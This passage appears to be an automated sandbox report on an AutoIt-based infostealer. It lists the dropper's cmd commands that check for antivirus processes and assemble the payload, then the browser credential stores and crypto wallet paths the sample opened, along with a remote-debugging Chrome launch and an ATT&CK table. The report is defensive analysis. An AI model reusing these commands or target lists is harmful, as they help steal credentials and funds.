                Source: Web Data.26.dr, Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: Web Data.26.dr, Binary or memory string: outlook.office.comVMware20,11696492231s
                Source: Web Data.26.dr, Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: Web Data.26.dr, Binary or memory string: AMC password management pageVMware20,11696492231
                Source: Web Data.26.dr, Binary or memory string: interactivebrokers.comVMware20,11696492231
                Source: Web Data.26.dr, Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: Miniature.com, 00000010.00000002.2125465557.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2126388687.0000000004438000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
                Source: msedge.exe, 00000018.00000003.1784294506.000071EC00374000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: VMware20,1(
                Source: Web Data.26.dr, Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: Web Data.26.dr, Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: Web Data.26.dr, Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: Web Data.26.dr, Binary or memory string: outlook.office365.comVMware20,11696492231t
                Source: Web Data.26.dr, Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: Web Data.26.dr, Binary or memory string: discord.comVMware20,11696492231f
                Source: chrome.exe, 00000015.00000002.1731336799.0000026C1B67D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000018.00000002.1846062956.000002B31EE45000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Web Data.26.dr, Binary or memory string: global block list test formVMware20,11696492231
                Source: Web Data.26.dr, Binary or memory string: dev.azure.comVMware20,11696492231j
                Source: Web Data.26.dr, Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: Web Data.26.dr, Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: Web Data.26.dr, Binary or memory string: bankofamerica.comVMware20,11696492231x
                Source: Web Data.26.dr, Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: Web Data.26.dr, Binary or memory string: tasks.office.comVMware20,11696492231o
                Source: Web Data.26.dr, Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: Web Data.26.dr, Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: Miniature.com, 00000010.00000002.2125663035.0000000001C8B000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: od_VMware_SATA_C
                Source: chrome.exe, 00000015.00000002.1724716741.0000010400724000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=965385b1-5c51-4270-9ac6-e4889d381090
                Source: Web Data.26.dr, Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: Web Data.26.dr, Binary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: Web Data.26.dr, Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: Web Data.26.dr, Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: Web Data.26.dr, Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: Web Data.26.dr, Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Process information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C8F4FF BlockInput
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C1338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe, Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C35058 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C720AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree
                Source: C:\Windows\SysWOW64\tasklist.exe, Process token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C42992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C30BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C30D45 SetUnhandledExceptionFilter
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C30F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match, File source: Process Memory Space: Miniature.com PID: 7416, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C71B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C1338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C7BBED SendInput,keybd_event
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C7ECD0 mouse_event
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cotton Cotton.cmd & Cotton.cmd
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 325114
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Grocery" Pink
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Through + ..\Aspects + ..\Except + ..\Prevention d
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Miniature.com d
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2508,i,6938199240973265480,1311617046375224324,262144 /prefetch:3
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C714AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C71FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: Miniature.com, 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp, Miniature.com.2.dr, Releases.0.dr, Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Miniature.com, Binary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C30A08 cpuid
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C6E5F4 GetLocalTime
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C6E652 GetUserNameW
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C4BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe, Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW

                Stealing of Sensitive Information

                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: 16.2.Miniature.com.170000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000010.00000003.1461652856.0000000004428000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.2125465557.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000003.1461452990.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000003.1461172169.000000000443F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000003.1461338592.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.2126191611.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000003.1461229379.0000000001BE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000003.1461592581.0000000001C8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.2122589934.0000000000171000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Miniature.com PID: 7416, type: MEMORYSTR
                Source: Miniature.com, 00000010.00000002.2123806267.00000000015CC000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: *electrum*.*
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: \ElectronCash\wallets\
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: \Electrum\wallets\
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: window-state.json
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: exodus.conf.json
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: \Exodus\
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: info.seco
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: ElectrumLTC
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: passphrase.json
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: \Ethereum\
                Source: Miniature.com, 00000010.00000002.2123806267.00000000015CC000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: *exodus*.*
                Source: Miniature.com, 00000010.00000002.2123806267.00000000015CC000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: *ethereum*.*
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: \Coinomi\Coinomi\wallets\
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: \Exodus\exodus.wallet\
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: MultiDoge
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: seed.seco
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: keystore
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: \Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\default\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\tmp\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Exodus\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Binance\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                Source: Miniature.com | Binary or memory string: WIN_81
                Source: Miniature.com | Binary or memory string: WIN_XP
                Source: Releases.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Miniature.com | Binary or memory string: WIN_XPe
                Source: Miniature.com | Binary or memory string: WIN_VISTA
                Source: Miniature.com | Binary or memory string: WIN_7
                Source: Miniature.com | Binary or memory string: WIN_8
                Source: Yara match | File source: 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Miniature.com PID: 7416, type: MEMORYSTR

                Remote Access Functionality

                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: 16.2.Miniature.com.170000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000010.00000003.1461652856.0000000004428000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.2125465557.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000003.1461452990.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000003.1461172169.000000000443F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000003.1461338592.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.2126191611.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000003.1461229379.0000000001BE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000003.1461592581.0000000001C8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.2122589934.0000000000171000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Miniature.com PID: 7416, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | Code function: 16_2_00C92263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,16_2_00C92263
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com | Code function: 16_2_00C91C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,16_2_00C91C61
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | 1 Native API | 2 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
